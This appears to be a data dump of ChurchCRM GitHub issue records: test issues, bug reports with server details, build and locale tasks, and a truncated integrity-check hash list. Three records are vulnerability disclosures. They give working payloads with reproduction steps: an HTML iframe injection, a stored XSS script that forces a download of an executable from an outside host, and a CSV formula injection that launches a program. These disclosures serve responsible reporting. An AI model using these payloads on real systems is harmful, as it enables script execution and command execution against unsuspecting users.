] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | Testing via new Node Bridge | https://api.github.com/repos/ChurchCRM/CRM/issues/5530/comments | 0 | 2020-11-16T17:22:33Z | 2020-11-16T17:23:49Z | https://github.com/ChurchCRM/CRM/issues/5530 | 744,019,961 | 5,530 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | 33333 | https://api.github.com/repos/ChurchCRM/CRM/issues/5529/comments | 0 | 2020-11-16T17:18:42Z | 2020-11-16T17:22:41Z | https://github.com/ChurchCRM/CRM/issues/5529 | 744,016,752 | 5,529 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | 33333 | https://api.github.com/repos/ChurchCRM/CRM/issues/5528/comments | 0 | 2020-11-16T17:18:17Z | 2020-11-16T17:18:34Z | https://github.com/ChurchCRM/CRM/issues/5528 | 744,016,421 | 5,528 |
[
"ChurchCRM",
"CRM"
] | sasdfasfasdfdd asfdasdfasdf asdfasdfasdf asdf asdf asdf | 33333 | https://api.github.com/repos/ChurchCRM/CRM/issues/5527/comments | 0 | 2020-11-16T17:17:00Z | 2020-11-16T17:18:28Z | https://github.com/ChurchCRM/CRM/issues/5527 | 744,015,286 | 5,527 |
[
"ChurchCRM",
"CRM"
] | Test issue body | Test issue | https://api.github.com/repos/ChurchCRM/CRM/issues/5526/comments | 0 | 2020-11-16T17:15:01Z | 2020-11-16T17:15:14Z | https://github.com/ChurchCRM/CRM/issues/5526 | 744,013,592 | 5,526 |
[
"ChurchCRM",
"CRM"
] | xde
Collected Value Title | Data
----------------------|----------------
Page Name |/master/v2/dashboard
Screen Size |2160x3840
Window Size |1202x1738
Page Size |1366x1738
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.24
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | sx | https://api.github.com/repos/ChurchCRM/CRM/issues/5525/comments | 0 | 2020-11-16T16:39:00Z | 2020-11-16T16:56:37Z | https://github.com/ChurchCRM/CRM/issues/5525 | 743,983,639 | 5,525 |
[
"ChurchCRM",
"CRM"
] | body
Collected Value Title | Data
----------------------|----------------
Page Name |/master/v2/dashboard
Screen Size |2160x3840
Window Size |843x1680
Page Size |1366x1680
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.24
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.3
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | bug title | https://api.github.com/repos/ChurchCRM/CRM/issues/5524/comments | 0 | 2020-11-16T04:13:53Z | 2020-11-16T04:15:51Z | https://github.com/ChurchCRM/CRM/issues/5524 | 743,454,658 | 5,524 |
[
"ChurchCRM",
"CRM"
] | deposit chart is broken on homepage
```
Uncaught TypeError: (new Chart(...)).Line is not a function
<anonymous> https://crm.fccqtpa.org/Menu.php:1224
jQuery 13
Menu.php:1224:48
<anonymous> https://crm.fccqtpa.org/Menu.php:1224
jQuery 13
```
Collected Value Title | Data
----------------------|----------------
Page Name |/Menu.php
Screen Size |1080x1920
Window Size |966x1920
Page Size |1736x1920
Platform Information | Linux CSHN001 4.4.0-178-generic #208-Ubuntu SMP Sun Apr 5 23:45:10 UTC 2020 x86_64
PHP Version | 7.3.14-1+ubuntu16.04.1+deb.sury.org+1
SQL Version | 5.7.32-0ubuntu0.16.04.1
ChurchCRM Version |4.1.0
Reporting Browser |Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |core,mod_so,mod_watchdog,http_core,mod_log_config,mod_logio,mod_version,mod_unixd,mod_access_compat,mod_alias,mod_auth_basic,mod_authn_core,mod_authn_file,mod_authz_core,mod_authz_host,mod_authz_user,mod_autoindex,mod_cgi,mod_deflate,mod_dir,mod_env,mod_expires,mod_filter,mod_headers,mod_mime,mpm_itk,prefork,mod_negotiation,mod_php7,mod_proxy,mod_proxy_http,mod_rewrite,mod_setenvif,mod_socache_shmcb,mod_ssl,mod_status | Deposit Tracking Chart on homepage is broken | https://api.github.com/repos/ChurchCRM/CRM/issues/5511/comments | 1 | 2020-11-12T00:30:02Z | 2020-11-13T17:35:24Z | https://github.com/ChurchCRM/CRM/issues/5511 | 741,174,303 | 5,511 |
[
"ChurchCRM",
"CRM"
] | generate locale file
upload locale file to POEditor
download updated locales from POEditor
| 4.2.3 POEditor Update & Latest Locale download | https://api.github.com/repos/ChurchCRM/CRM/issues/5502/comments | 0 | 2020-11-09T22:06:18Z | 2020-11-14T21:12:29Z | https://github.com/ChurchCRM/CRM/issues/5502 | 739,397,151 | 5,502 |
[
"ChurchCRM",
"CRM"
] | **If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
On the CRM Login screen.
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
Dedicated (Linux)
#### What browser (and version) are you running?
Chrome Version 86.0.4240.183 (Official Build) (64-bit)
#### What version of PHP is the server running?
Unknown
#### What version of SQL Server are you running?
Unknown
#### What version of ChurchCRM are you running?
Unknown | I can't get past the login screen! | https://api.github.com/repos/ChurchCRM/CRM/issues/5497/comments | 2 | 2020-11-04T09:42:32Z | 2020-11-05T10:38:39Z | https://github.com/ChurchCRM/CRM/issues/5497 | 735,964,773 | 5,497 |
[
"ChurchCRM",
"CRM"
] | Nexmo is now Vonage we need to move to it.
https://github.com/Nexmo/nexmo-php | Move Vonage from Nexmo | https://api.github.com/repos/ChurchCRM/CRM/issues/5490/comments | 0 | 2020-11-03T22:27:26Z | 2020-11-09T20:35:46Z | https://github.com/ChurchCRM/CRM/issues/5490 | 735,675,812 | 5,490 |
[
"ChurchCRM",
"CRM"
] | #### What version of ChurchCRM are you running?
4.2.2
```
The "ocramius/package-versions" plugin was skipped because it requires a Plugin API version ("^1.0.0") that does not match your Composer installation ("2.0.0"). You may need to run composer update with the "--no-plugins" option.
Installing dependencies from lock file (including require-dev)
Verifying lock file contents can be installed on current platform.
Warning: The lock file is not up to date with the latest changes in composer.json. You may be getting outdated dependencies. It is recommended that you run `composer update` or `composer update <package name>`.
Your lock file does not contain a compatible set of packages. Please run composer update.
Problem 1
- ocramius/package-versions is locked to version 1.4.2 and an update of this package was not requested.
- ocramius/package-versions 1.4.2 requires composer-plugin-api ^1.0.0 -> found composer-plugin-api[2.0.0] but it does not match the constraint.
Problem 2
- ocramius/package-versions 1.4.2 requires composer-plugin-api ^1.0.0 -> found composer-plugin-api[2.0.0] but it does not match the constraint.
- nexmo/client-core 2.4.1 requires ocramius/package-versions ^1.4 -> satisfiable by ocramius/package-versions[1.4.2].
- nexmo/client-core is locked to version 2.4.1 and an update of this package was not requested.
ocramius/package-versions only provides support for Composer 2 in 1.8+, which requires PHP 7.4.
If you can not upgrade PHP you can require composer/package-versions-deprecated to resolve this with PHP 7.0+.
``` | Build fails on composer 2 | https://api.github.com/repos/ChurchCRM/CRM/issues/5489/comments | 0 | 2020-11-03T19:48:48Z | 2020-11-04T00:41:54Z | https://github.com/ChurchCRM/CRM/issues/5489 | 735,591,715 | 5,489 |
[
"ChurchCRM",
"CRM"
] | generate locale file
upload locale file to POEditor
download updated locales from POEditor
| 4.2.2 POEditor Update & Latest Locale download | https://api.github.com/repos/ChurchCRM/CRM/issues/5487/comments | 0 | 2020-11-03T19:27:04Z | 2020-11-03T19:27:22Z | https://github.com/ChurchCRM/CRM/issues/5487 | 735,579,445 | 5,487 |
[
"ChurchCRM",
"CRM"
] | This started suddenly about two weeks ago. I had not updated anything, and my previous login was just fine. Now all it will do is reload the login page. How do I debug this?
**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**
#### On what page in the application did you find this issue?
Login screen
#### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?
shared Linux
#### What browser (and version) are you running?
Chrome version 86.0.4240.111 64-bit
#### What version of PHP is the server running?
PHP 7.4.11
#### What version of SQL Server are you running?
MariaDB 10.4.14
#### What version of ChurchCRM are you running?
4.2.0
| Can't get past login screen | https://api.github.com/repos/ChurchCRM/CRM/issues/5486/comments | 6 | 2020-11-02T22:26:51Z | 2020-11-03T20:32:53Z | https://github.com/ChurchCRM/CRM/issues/5486 | 734,878,059 | 5,486 |
[
"ChurchCRM",
"CRM"
] | [01-Nov-2020 20:40:49 America/Detroit] Slim Application Error:
Type: Error
Message: Class 'ChurchCRM\Authentication\AuthenticationProviders\LockedEmail' not found
File: /Users/dawoudio/development/churchcrm/CRM/src/ChurchCRM/Authentication/AuthenticationProviders/LocalAuthentication.php
Line: 143
Trace: #0 /Users/dawoudio/development/churchcrm/CRM/src/ChurchCRM/Authentication/AuthenticationManager.php(101): ChurchCRM\Authentication\AuthenticationProviders\LocalAuthentication->Authenticate(Object(ChurchCRM\Authentication\Requests\LocalUsernamePasswordRequest))
#1 /Users/dawoudio/development/churchcrm/CRM/src/session/index.php(78): ChurchCRM\Authentication\AuthenticationManager::Authenticate(Object(ChurchCRM\Authentication\Requests\LocalUsernamePasswordRequest))
#2 [internal function]: beginSession(Object(ChurchCRM\Authentication\Requests\LocalUsernamePasswordRequest), Object(Slim\Http\Response), Array)
| Locked Email Not sending | https://api.github.com/repos/ChurchCRM/CRM/issues/5485/comments | 0 | 2020-11-02T01:49:13Z | 2020-11-02T01:56:26Z | https://github.com/ChurchCRM/CRM/issues/5485 | 734,120,649 | 5,485 |
[
"ChurchCRM",
"CRM"
] | - generate locale file
- upload locale file to POEditor
- download updated locales from POEditor | 4.3.0 POEditor Update & Latest Locale download | https://api.github.com/repos/ChurchCRM/CRM/issues/5479/comments | 0 | 2020-10-29T21:31:15Z | 2020-11-21T20:40:05Z | https://github.com/ChurchCRM/CRM/issues/5479 | 732,677,674 | 5,479 |
[
"ChurchCRM",
"CRM"
] | **Name:** HTML Injection Vulnerability
**Description:** HTML Injection exists in the 'Deposit Comment' parameter in ChurchCRM application via "Add New Deposit" module that is mistreated while providing an HTML payload to the input field. HTML injection occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page.
**Impact:** The vulnerability allows an attacker to inject HTML payloads which could result in defacement, user redirection to a malicious webpage/website, modifying page content etc.
**Version Affected:** 4.2.1 and below
**Payload Used:**
`<iframe src="https://www.bing.com/" style="height:1000px;width:1000px" title="Iframe Example"></iframe>`
**Vulnerable URL:** /master/FindDepositSlip.php
**Vulnerable Parameters:** Deposit Comment
**Steps to Reproduce:**
1. Login to the application, go to 'View all Deposits' module.
2. Add the payload in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed successfully.
**Reference :**
https://www.cvedetails.com/cve/CVE-2019-17223/
**POC :**


**Note:** There are multiple locations apart from Deposit module where the input is not validated properly | HTML Injection Vulnerability | https://api.github.com/repos/ChurchCRM/CRM/issues/5478/comments | 3 | 2020-10-29T13:39:53Z | 2024-01-05T02:07:10Z | https://github.com/ChurchCRM/CRM/issues/5478 | 732,323,400 | 5,478 |
[
"ChurchCRM",
"CRM"
] | **Name:** Stored Cross Site Scripting leading to Remote File Inclusion vulnerability
**Description:** ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit.
Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
**Impact:** The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions.
**Version Affected:** 4.2.1 and below
**Payload Used:**
`<script>var link = document.createElement('a');
link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe';
link.download = '';
document.body.appendChild(link);
link.click();
</script>`
**Vulnerable URL:** /master/FindDepositSlip.php
**Vulnerable Parameters:** Deposit Comment
**Steps to Reproduce:**
1. Login to the application, go to 'View all Deposits' module.
2. Add the payload in the 'Deposit Comment' field and click "Add New Deposit".
3. Payload is executed and a .exe file is downloaded.
**Reference :**
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17205
**POC :**


**Mitigation:**
Proper input validation and encoding should be employed to prevent the execution of any hazardous scripts.
**Note:** There are multiple locations apart from Deposit module where the input is not sanitized properly | Cross Site Scripting Vulnerability leading to Remote File Inclusion | https://api.github.com/repos/ChurchCRM/CRM/issues/5477/comments | 5 | 2020-10-29T13:29:35Z | 2024-03-04T02:13:11Z | https://github.com/ChurchCRM/CRM/issues/5477 | 732,315,548 | 5,477 |
[
"ChurchCRM",
"CRM"
] |

Collected Value Title | Data
----------------------|----------------
Page Name |/GeoPage.php
Screen Size |2160x3840
Window Size |1268x2603
Page Size |2074x2603
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Wed Oct 7 21:17:40 PDT 2020; root:xnu-7195.40.137.201.1~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.1
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"One or more files failed signature validation","files":
Apache Modules |core,mod_ssl,prefork,http_core,mod_so,mod_authn_file,mod_authn_dbm,mod_authn_anon,mod_authn_dbd,mod_authn_default,mod_authz_host,mod_authz_groupfile,mod_authz_user,mod_authz_dbm,mod_authz_owner,mod_authz_default,mod_auth_basic,mod_auth_digest,mod_file_cache,mod_cache,mod_disk_cache,mod_mem_cache,mod_dbd,mod_bucketeer,mod_dumpio,mod_case_filter,mod_case_filter_in,mod_reqtimeout,mod_ext_filter,mod_include,mod_filter,mod_substitute,mod_charset_lite,mod_deflate,mod_log_config,mod_logio,mod_env,mod_mime_magic,mod_cern_meta,mod_expires,mod_headers,mod_ident,mod_usertrack,mod_setenvif,mod_version,mod_proxy,mod_proxy_connect,mod_proxy_ftp,mod_proxy_http,mod_proxy_scgi,mod_proxy_ajp,mod_proxy_balancer,mod_mime,mod_dav,mod_status,mod_autoindex,mod_asis,mod_info,mod_cgi,mod_fastcgi,mod_cgid,mod_dav_fs,mod_vhost_alias,mod_negotiation,mod_dir,mod_imagemap,mod_actions,mod_speling,mod_userdir,mod_alias,mod_rewrite,mod_perl,mod_wsgi,mod_xsendfile,mod_php7 | Family Geo Does not filter by Max distance (when LAT+LONG are missing) | https://api.github.com/repos/ChurchCRM/CRM/issues/5474/comments | 5 | 2020-10-24T22:31:15Z | 2024-01-07T02:11:58Z | https://github.com/ChurchCRM/CRM/issues/5474 | 728,891,062 | 5,474 |
[
"ChurchCRM",
"CRM"
] | Update from POEditor as neeed | 4.2.1: Locale Update | https://api.github.com/repos/ChurchCRM/CRM/issues/5466/comments | 0 | 2020-10-24T21:08:31Z | 2020-10-28T16:57:02Z | https://github.com/ChurchCRM/CRM/issues/5466 | 728,877,600 | 5,466 |
[
"ChurchCRM",
"CRM"
] | **Vulnerability Name:** CSV Injection/ Formula Injection
**Severity:** High
**Description:** CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file.
**Impact:** Arbitrary formulas can be injected into CSV files which can lead to remote code execution at the client or data leakage via maliciously injected hyper-links.
**Version Affected:** 4.2.0
**Payload Used:** =10+20+cmd|' /C calc'!A0
**Vulnerable URL:** master/EventNames.php
**Vulnerable Parameters:** Name
**Steps to Reproduce:**
1. Login to the application, goto 'Events' module and then "List Event Types"
2. Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field
3. Now goto 'List Event types' module and click CSV to download the CSV file
4. Open the CSV file, allow all popups and our payload is executed (calculator is opened).


**Note:** Incase the payload does not execute, then enable 'External Content' and 'Macro' settings in Excel. Goto Excel > File > Options > Trust Center > Trust Center Settings > Macro/External Content.
**References:**
https://nvd.nist.gov/vuln/detail/CVE-2019-12134
http://cwe.mitre.org/data/definitions/1236.html
| CSV Injection Vulnerability | https://api.github.com/repos/ChurchCRM/CRM/issues/5465/comments | 7 | 2020-10-24T05:01:52Z | 2024-01-08T02:08:20Z | https://github.com/ChurchCRM/CRM/issues/5465 | 728,661,432 | 5,465 |
[
"ChurchCRM",
"CRM"
] |

Collected Value Title | Data
----------------------|----------------
Page Name |/master/v2/index.php
Screen Size |2160x3840
Window Size |1530x2586
Page Size |1530x2586
Platform Information | Linux az1-ss27.a2hosting.com 3.10.0-962.3.2.lve1.5.26.4.el7.x86_64 #1 SMP Wed Sep 11 10:29:54 EDT 2019 x86_64
PHP Version | 7.3.23
SQL Version | 10.3.23-MariaDB-cll-lve
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"success"}
Apache Modules |mod_rewrite,mod_mime,mod_headers,mod_expires,mod_auth_basic | Locale % broken post 4.2.0 upgrade | https://api.github.com/repos/ChurchCRM/CRM/issues/5463/comments | 1 | 2020-10-19T22:06:42Z | 2020-10-24T21:10:16Z | https://github.com/ChurchCRM/CRM/issues/5463 | 725,010,666 | 5,463 |
[
"ChurchCRM",
"CRM"
] |
Collected Value Title | Data
----------------------|----------------
Page Name |/EventEditor.php
Screen Size |2160x3840
Window Size |1939x1920
Page Size |1939x1920
Platform Information | Darwin dawouds.lan 20.1.0 Darwin Kernel Version 20.1.0: Wed Oct 7 21:17:40 PDT 2020; root:xnu-7195.40.137.201.1~1/RELEASE_X86_64 x86_64
PHP Version | 7.3.9
SQL Version | 5.7.26
ChurchCRM Version |4.2.0
Reporting Browser |Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36
Prerequisite Status |All Prerequisites met
Integrity check status |{"status":"failure","message":"One or more files failed signature validation","files":[{"filename":"api\/index.php","status":"Hash Mismatch","expectedhash":"546cd4c8fdcb671cc68bec24fc7003ff057c55dd","actualhash":"186382351de6d58ce067fd4457cafda967e99d80"},{"filename":"api\/routes\/background.php","status":"Hash Mismatch","expectedhash":"92452f0b099bef979f83266042f74d378fc59735","actualhash":"3572b5e8fd659a60410b0a5f7709c26d3a4f8512"},{"filename":"api\/routes\/finance\/finance-deposits.php","status":"Hash Mismatch","expectedhash":"6c6940d1fe0f56822f8cffcf774889ca17f6c7b4","actualhash":"2547029530c45f7e3863b5893ec43a899b2eebdc"},{"filename":"api\/routes\/people\/people-families.php","status":"Hash Mismatch","expectedhash":"6f11ec62fa9fc4806970a852a9f2ca43642a7bef","actualhash":"e5065ce65623bb1a68ef18525295aa813bc4d7c8"},{"filename":"api\/routes\/people\/people-persons.php","status":"Hash Mismatch","expectedhash":"81b789de67e4368c1a10c9c9d49deac72dd0a50a","actualhash":"1ab47a4637903b7b67b9acad7110e820f348970e"},{"filename":"api\/routes\/people\/people-properties.php","status":"Hash Mismatch","expectedhash":"1fe54769c22002007bb4f37c2e13f7a20ded2b11","actualhash":"102b10024260cb7c6a00c1073583622aa0819943"},{"filename":"api\/routes\/system\/system-database.php","status":"Hash Mismatch","expectedhash":"04ff0512ae7a60dde7bb85ff0aefab038aa11f1c","actualhash":"b6b1710c6a0b51be8f100eb51b4619954bea4ec6"},{"filename":"api\/routes\/system\/system.php","status":"Hash Mismatch","expectedhash":"8738189118899d2d4fa9d6461f9d68eb4f8e79e9","actualhash":"843bd1667f311fdbfb74c13e352ff43e02ff363c"},{"filename":"ChurchCRM\/Bootstrapper.php","status":"Hash Mismatch","expectedhash":"18462b9dd6606f30fa80baff42d01b08e27513b2","actualhash":"cb09b0968b79e6eeb74a819b40ab1b372107b6e7"},{"filename":"ChurchCRM\/Dashboard\/ClassificationDashboardItem.php.php","status":"Hash Mismatch","expectedhash":"547f4df9ab1483a7bead2b4e8b263b3984817196","actualhash":"5c6ff6aca46b57ebb5f3f047ccd7d3cb4918f4f2"},{"filename":"ChurchCRM\/Dashboard\/EventsDashboardItem.php","status":"File Missing"},{"filename":"ChurchCRM\/Dashboard\/PersonDemographicDashboardItem.php","status":"File Missing"},{"filename":"ChurchCRM\/dto\/SystemConfig.php","status":"Hash Mismatch","expectedhash":"bc96e8c179cec54a9319203aed01ee2f1e815e24","actualhash":"a2ebcbd5d182fe9c8bce46a373e17b350deb42f7"},{"filename":"ChurchCRM\/model\/ChurchCRM\/Person.php","status":"Hash Mismatch","expectedhash":"a3ad2ba9e3f5f73a0caafc38822c877d78393202","actualhash":"c8f36b2b03d0b644c231356d3cde5815565f503f"},{"filename":"ChurchCRM\/Service\/AppIntegrityService.php","status":"Hash Mismatch","expectedhash":"2d3858ca5cf1c5663a9801ffb621852cf70083d1","actualhash":"859e8d9f3efe00e874424b01b80574516b1b9045"},{"filename":"ChurchCRM\/Service\/NewDashboardService.php","status":"Hash Mismatch","expectedhash":"8e4e20ebd3df8a08ab3a2c712c664005a84cb1c3","actualhash":"0c06726e847ee8273876f857096a8314aa6850bd"},{"filename":"ChurchCRM\/Service\/SystemService.php","status":"Hash Mismatch","expectedhash":"ae0bcb5d326f2c4aa837a6b0e714d375ee0badd1","actualhash":"42568408823bb03b1f8ade0cd69949c74c1156c0"},{"filename":"ChurchCRM\/Slim\/Middleware\/Request\/FamilyAPIMiddleware.php","status":"Hash Mismatch","expectedhash":"ac75d814e44311f4579263c7b70d5d1738fdc764","actualhash":"755c7364bd94cf57f2c05dc64da5b1ff93236094"},{"filename":"ChurchCRM\/Slim\/Middleware\/Request\/GroupAPIMiddleware.php","status":"Hash Mismatch","expectedhash":"e1e24060a9c4ee191dfd34d42287566324f5e269","actualhash":"ff5edb4bf6f8a85222d9c18bef196a7732286e71"},{"filename":"ChurchCRM\/Slim\/Middleware\/Request\/PersonAPIMiddleware.php","status":"Hash Mismatch","expectedhash":"a640e0e5029d44093b295262dc57ff9ebedc43a9","actualhash":"ad7367438c2504f63a3651f3987657073c49b845"},{"filename":"ChurchCRM\/tasks\/PHPPendingDeprecationVersionCheckTask.php","status":"Hash Mismatch","expectedhash":"e5400538c5a3eaf807703eec58f936b575328920","actualhash":"58a0011a7eceb6abf8dcc1ce1d54c731e23498e8"},{"filename":"CSVCreateFile.php","status":"Hash Mismatch","expectedhash":"bb2399d98f40b25f447eec9f1a21f00667e8772f","actualhash":"cd05795efbc5aaa887122138dcf945c92e0521c9"},{"filename":"external\/index.php","status":"Hash Mismatch","expectedhash":"20b04abbd5ef0b3d9843a341da0755066bb5f0c6","actualhash":"7ba2d4ee8fa5aaf71a6cff48f5eb219d031f1bf0"},{"filename":"Include\/Footer.php","status":"Hash Mismatch","expectedhash":"0b9046ea6fca49e5a7950c7e765269cb3238cb8b","actualhash":"1dd40bf89cb834654dc18d09d32d6a3f025bfcee"},{"filename":"Include\/FooterNotLoggedIn.php","status":"Hash Mismatch","expectedhash":"5678f485d6d9a10cec2a1692be047559be5c3264","actualhash":"8a965015d83f57fa390ba79bd268e67f730d92d2"},{"filename":"Include\/slim\/settings.php","status":"File Missing"},{"filename":"kiosk\/index.php","status":"Hash Mismatch","expectedhash":"9d8022745fc08e7e52587750c1bcd3a61165850a","actualhash":"1d065d590a447867a0ad4e542a8cde0ec515c33e"},{"filename":"Menu.php","status":"Hash Mismatch","expectedhash":"268fafdc2a1f917628649959cce329602501066d","actualhash":"529663e5d1d7a8c997a1a4016ca1755dbc42863b"},{"filename":"PersonView.php","status":"Hash Mismatch","expectedhash":"f8fb886656cf7712cad2311bc661419f25eb6445","actualhash":"156439b4f897f669f661ebc7091052b1a4c276e4"},{"filename":"PropertyAssign.php","status":"Hash Mismatch","expectedhash":"3e2f49dc21e04388632850991727aac77d1e6e59","actualhash":"ae8c15913caa985fbcb1d29de8d80f296d283f68"},{"filename":"PropertyUnassign.php","status":"Hash Mismatch","expectedhash":"01e2556fb0ae5225e8daf35cc359d325c7786801","actualhash":"3e1c907c416e694f3ff0979ba30f048f82887fbe"},{"filename":"session\/index.php","status":"Hash Mismatch","expectedhash":"5d2b014b4019823b15a05417f5208a2d7cda15eb","actualhash":"22eae76d00ac5f668804ef92112bcaf0af8d2adf"},{"filename":"setup\/index.php","status":"Hash Mismatch","expectedhash":"9d8a0d820c54f704251b40a5faf18fd820844ede","actualhash":"cf80989e0baa58ae8f907444660e2730b9742a6d"},{"filename":"v2\/index.php","status":"Hash Mismatch","expectedhash":"9c74d9d18684cea33b7c58ee79c7872e0808c0cc","actualhash":"536fbb10a592ad76d42f1674bc8d16735bc513b2"},{"filename":"v2\/templates\/people\/family-view.php","status":"Hash Mismatch","expectedhash":"166099fd2ea388df3ca1763a92e91413b3c53d49","actualhash":"30a39b09d0c41fa79daae79b7bcae43511fc2e69"},{"filename":"vendor\/clue\/stream-filter\/examples\/base64_decode.php","status":"File Missing"},{"filename":"vendor\/clue\/stream-filter\/examples\/base64_encode.php","status":"File Missing"},{"filename":"vendor\/clue\/stream-filter\/examples\/uppercase.php","status":"File Missing"},{"filename":"vendor\/clue\/stream-filter\/src\/CallbackFilter.php","status":"Hash Mismatch","expectedhash":"c2e107410c30b5cd8e6ab7ec3dcde46cafbfcfb2","actualhash":"c0c3bcb2eeca412f73daff687bf5d31c56d6a30e"},{"filename":"vendor\/clue\/stream-filter\/src\/functions_include.php","status":"Hash Mismatch","expectedhash":"5e19663072cbef587e889266c31421754374305a","actualhash":"3e2bc6ea2faff7436d8401745191a80dba7f0c3d"},{"filename":"vendor\/clue\/stream-filter\/src\/functions.php","status":"Hash Mismatch","expectedhash":"690c4426875ed4338cc1c9a2f860e63a611e15bc","actualhash":"021d8a4585d17216f566409bfd31db2a9dd0c129"},{"filename":"vendor\/composer\/autoload_classmap.php","status":"Hash Mismatch","expectedhash":"ed393deed539c99672818c858609488f406fe6cb","actualhash":"1b740919418d8bd4a66f6ddd2846b2c045d7ea59"},{"filename":"vendor\/composer\/autoload_psr4.php","status":"Hash Mismatch","expectedhash":"09cecb554ff50fc2c5be70e168d5896568f8cf8e","actualhash":"026a098827bbe80dddd2f7344bce150e02aabc71"},{"filename":"vendor\/composer\/autoload_static.php","status":"Hash Mismatch","expectedhash":"c83459c5645b09d79b2cbf5f79ebf457caaf22cb","actualhash":"6ea5c2530012e85b567c30c766c41434f5229092"},{"filename":"vendor\/container-interop\/container-interop\/src\/Interop\/Container\/ContainerInterface.php","status":"File Missing"},{"filename":"vendor\/container-interop\/container-interop\/src\/Interop\/Container\/Exception\/ContainerException.php","status":"File Missing"},{"filename":"vendor\/container-interop\/container-interop\/src\/Interop\/Container\/Exception\/NotFoundException.php","status":"File Missing"},{"filename":"vendor\/dasprid\/enum\/src\/AbstractEnum.php","status":"Hash Mismatch","expectedhash":"77f17f2f3de5f20e02d389c82ee53772c2c2b0a7","actualhash":"303122e47fac302c140582e58c2c1eda23384b54"},{"filename":"vendor\/endroid\/qr-code\/src\/Writer\/PngWriter.php","status":"Hash Mismatch","expectedhash":"873fa1500ea7f7074b111c3764f0bf562147d8a1","actualhash":"4521531c64d72e62554bd0fa1723e7dd9095a17b"},{"filename":"vendor\/endroid\/qr-code\/src\/Writer\/SvgWriter.php","status":"Hash Mismatch","expectedhash":"ce8d3fafded1d6eed7f36fd4e17448da70e4d424","actualhash":"761ff5966fad7d998c8a9b9638a5a0bfa4b8115e"},{"filename":"vendor\/guzzlehttp\/promises\/src\/AggregateException.php","status":"Hash Mismatch","expectedhash":"7b1d9590467ebb9ecedc1740ce4e16a745126907","actualhash":"0772762e30926c2bb99287b1cc7c88d8643343a6"},{"filename":"vendor\/guzzlehttp\/promises\/src\/CancellationException.php","status":"Hash Mismatch","expectedhash":"e95eacc44ab17a1363a56ecd89ce675e91ad14ad","actualhash":"c36686e9f7f0d01c9f229f16c79c35723a9ac323"},{"filename":"vendor\/guzzlehttp\/promises\/src\/Coroutine.php","status":"Hash Mismatch","expectedhash":"00557b6c01c1e1613d7e47492f4cfcac331c8010","actualhash":"4b7987d07a8dda82ac869d2ad742060e3da0bdec"},{"filename":"vendor\/guzzlehttp\/promises\/src\/EachPromise.php","status":"Hash Mismatch","expectedhash":"eeb0deca7d365c134947e936f48031b2b73ea44e","actualhash":"f93a90b0b13472f609864403f82b13cc5a9ce61e"},{"filename":"vendor\/guzzlehttp\/promises\/src\/FulfilledPromise.php","status":"Hash Mismatch","expectedhash":"3fce6bcb7ba81834cf67f0be1bf1d6f09cb92d91","actualhash":"7eb71fa47e80d5f55400aa619ae18c2376117b41"},{"filename":"vendor\/guzzlehttp\/promises\/src\/functions.php","status":"Hash 